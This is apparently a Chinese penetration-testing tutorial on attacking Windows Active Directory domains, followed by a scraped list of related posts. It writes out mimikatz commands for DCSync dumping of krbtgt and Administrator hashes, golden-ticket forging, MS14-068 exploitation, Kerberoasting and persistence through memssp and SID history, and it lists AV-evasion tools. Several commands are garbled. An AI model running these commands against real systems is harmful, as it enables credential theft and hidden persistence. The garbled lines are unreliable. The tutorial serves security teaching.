渗透测试入门9之域渗透

信息搜集

powerview.ps1

Get-NetDomain - gets the name of the current user's domain

Get-NetForest - gets the forest associated with the current user's domain

Get-NetForestDomains - gets all domains for the current forest

Get-NetDomainControllers - gets the domain controllers for the current computer's domain

Get-NetCurrentUser - gets the current [domain\]username

Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)

Get-NetUserSPNs - gets all user ServicePrincipalNames

Get-NetOUs - gets data for domain organization units

Get-NetGUIDOUs - finds domain OUs linked to a specific GUID

Invoke-NetUserAdd - adds a local or domain user

Get-NetGroups - gets a list of all current groups in the domain

Get-NetGroup - gets data for each user in a specified domain group

Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts

Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts

Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts

Invoke-NetGroupUserAdd - adds a user to a specified local or domain group

Get-NetComputers - gets a list of all current servers in the domain

Get-NetFileServers - get a list of file servers used by current domain users

Get-NetShare - gets share information for a specified server

Get-NetLoggedon - gets users actively logged onto a specified server

Get-NetSessions - gets active sessions on a specified server

Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles

Get-NetConnections - gets active connections to a specific server resource (share)

Get-NetFiles - gets open files on a server

Get-NetProcesses - gets the remote processes and owners on a remote server

BloodHound ​

获取域控的方法

SYSVOL

SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。 相关阅读:

  • 寻找SYSVOL里的密码和攻击GPP(组策略偏好)
  • Windows Server 2008 R2之四管理Sysvol文件夹
  • SYSVOL中查找密码并利用组策略首选项
  • 利用SYSVOL还原组策略中保存的密码

MS14-068 Kerberos

python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机

利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书:

mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit

net use k: \pentest.comc$

相关阅读 :

  • Kerberos的工具包PyKEK
  • 深入解读MS14-068漏洞
  • Kerberos的安全漏洞

SPN扫描

Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。 SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。 SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。 相关阅读 :

  • 非扫描式的SQL Server发现
  • SPN扫描
  • 扫描SQLServer的脚本

Kerberos的黄金门票

在域上抓取的哈希

lsadump::dcsync /domain:pentest.com /user:krbtgt

kerberos::purge

kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi

kerberos::ptt administrator.kiribi

kerberos::tgt

net use k: \pnet use k: \pentest.comc$

相关阅读 :

  • https://adsecurity.org/?p=1640
  • 域服务账号破解实践
  • Kerberos的认证原理
  • 深刻理解windows安全认证机制ntlm&Kerberos

Kerberos的银票务

黄金票据和白银票据的一些区别: Golden Ticket:伪造TGT,可以获取任何Kerberos服务权限 银票:伪造TGS,只能访问指定的服务 加密方式不同: Golden Ticket由krbtgt的hash加密 Silver Ticket由服务账号(通常为计算机账户)Hash加密 认证流程不同: 金票在使用的过程需要同域控通信 银票在使用的过程不需要同域控通信 相关阅读 :

  • 攻击者如何使用Kerberos的银票来利用系统
  • 域渗透——Pass The Ticket

域服务账号破解

与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户

setspn -T PENTEST.com -Q */*

从Mimikatz的RAM中提取获得的门票

kerberos::list /export

用rgsrepcrack破解

tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

凭证盗窃

从搜集的密码里面找管理员的密码

地址解析协议

实在搞不定再搞ARP ​

获取AD哈希

  • 使用VSS卷影副本
  • Ntdsutil中获取NTDS.DIT​​文件
  • PowerShell中提取NTDS.DIT -->Invoke-NinaCopy
  • 使用Mimikatz提取

mimikatz lsadump::lsa /inject exit

  • 使用PowerShell Mimikatz
  • 使用Mimikatz的DCSync 远程转储Active Directory凭证 提取 KRBTGT用户帐户的密码数据:

Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit

管理员用户帐户提取密码数据:

Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit

  • NTDS.dit中提取哈希 使用esedbexport恢复以后使用ntdsxtract提取

AD持久化

活动目录持久性技巧

https://adsecurity.org/?p=1929 DS恢复模式密码维护 DSRM密码同步

Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)

DCshadow

Security Support Provider

简单的理解为SSP就是一个DLL,用来实现身份认证

privilege::debug

misc::memssp

这样就不需要重启c:/windows/system32可看到新生成的文件kiwissp.log

SID History

SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户

mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"

AdminSDHolder&SDProp

利用AdminSDHolder&SDProp(重新)获取域管理权限

组策略

https://adsecurity.org/?p=2716 策略对象在持久化及横向渗透中的应用

Hook PasswordChangeNotify

http://wooyun.jozxing.cc/static/drops/tips-13079.html

TIPS

《域渗透——Dump Clear-Text Password after KB2871997 installed》 《域渗透——Hook PasswordChangeNotify》

可通过Hook PasswordChangeNotify实时记录域控管理员的新密码

《域渗透——Local Administrator Password Solution》

域渗透时要记得留意域内主机的本地管理员账号

《域渗透——利用SYSVOL还原组策略中保存的密码》

相关工具

BloodHound CrackMapExec DeathStar

利用过程:http://www.freebuf.com/sectool/160884.html

在远程系统上执行程序

  • At
  • Psexec
  • WMIC
  • Wmiexec
  • Smbexec
  • Powershell remoting
  • DCOM

IOT相关

  • 1、路由器 routersploit
  • 2、打印机 PRET
  • 3、IOT exp https://www.exploitee.rs/
  • 4、相关 OWASP-Nettacker isf icsmaster

中间人

  • Cain
  • Ettercap
  • Responder
  • MITMf
  • 3r/MITMf)

规避杀软及检测

Bypass Applocker

UltimateAppLockerByPassList https://lolbas-project.github.io/

bypassAV

  • Empire
  • PEspin
  • Shellter
  • Ebowla
  • Veil
  • PowerShell
  • Python
  • 代码注入技术Process Doppelgänging
  • ...

渗透测试入门9之域渗透相关推荐

  1. 渗透测试入门8之端口渗透

    渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...

  2. 渗透测试入门23之OSCP渗透测试认证经验分享

    "120天的旅程即将结束,以一场历时24小时没有选择题的考试,收获屠龙路上第一座里程碑.-" 这是我通过OSCP认证考试时,第一时间的感受.自豪和欣喜之情不亚于2008年我拿下CC ...

  3. 渗透测试入门21之Metasploit渗透测试常用流程

    Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它具有图形化界面和命令行界面,这里讲的是msfconsole惯用的操作流程.本章使用的metas ...

  4. 渗透测试入门1之信息收集

    渗透测试入门1之信息收集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 子域名获取 字典列表 邮箱列表获 ...

  5. 渗透测试入门5之内网信息搜集

    渗透测试入门5之内网信息搜集 本机信息搜集 1.用户列表 windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 2.进程列表 分析杀毒软件/安全监控工具等 邮件客户端 VP ...

  6. Android渗透测试Android渗透测试入门教程大学霸

    Android渗透测试Android渗透测试入门教程大学霸 第1章  Android渗透测试 Android是一种基于Linux的自由及开放源代码的操作系统,主要用于移动设备,如智能手机.平板等.目前 ...

  7. 渗透测试入门24之渗透测试参考书、课程、工具、认证

    白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...

  8. 渗透测试入门3之隐匿攻击

    渗透测试入门3之隐匿攻击 1. Command and Control ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icm ...

  9. 渗透测试入门7之权限维持

    渗透测试入门7之权限维持 系统后门 Windows 1.密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 ...

最新文章

  1. 学 Win32 汇编[17]: 关于压栈(PUSH)与出栈(POP) 之一
  2. 《从零开始学Swift》学习笔记(Day 7)——Swift 2.0中的print函数几种重载形式
  3. 二叉查找树-优化版,使用了指针引用
  4. C++中this指针的用法详解
  5. 花式模拟【栈结构】做“日志分析”(洛谷P1165题题解,Java语言描述)
  6. ip、url威胁情报库(开源)
  7. redis的安装和常用命令
  8. English--不定式
  9. 国际直拨电话号码格式
  10. 人工智能设计概述(二)
  11. ARCGIS 栅格转点操作步骤
  12. 新的掌舵手已就位,汽车之家这艘船将驶向何方?
  13. pytorch 将数据集加载到内存后再训练
  14. Day11 - Ruby的block,proc,lamdba方法比较
  15. DB2 错误解决方案:A system temporary table space with sufficient page size does not exist.. SQLCODE=-1585,
  16. 哈希表除留取余法的桶个数为什么是质数
  17. java中除法和取余的若干注意
  18. 问卷数据分析方法都有哪些?
  19. Unity 安装 Device Simulator
  20. 内存泄漏分析框架LeakCanary的使用与原理解析

热门文章

  1. php怎么进行异步编程,php异步编程是怎样的?
  2. 转:MSDN Visual系列:MOSS企业级搜索之一——在搜索中心里创建自定义搜索页面和标签选项卡...
  3. [深入React] 1. 开发环境搭建
  4. 全面控制Windows任务栏
  5. NeurIPS2021 港大腾讯AI Lab牛津提出:CARE,让CNN和Transformer能在对比学习中“互帮互助”!...
  6. 一个方案搞定从模型量化到端侧部署全流程
  7. NeurIPS2019无人驾驶研究成果大总结(含大量论文及项目数据)
  8. 想转行,是要入坑Python还是Java?这问题还用问?
  9. 小伙C++代码实现短信表白,软萌甜炸,送给你最喜欢的人!你值得拥有
  10. C语言/C++程序员大神打造纯C的电子时钟(加图形库+源码)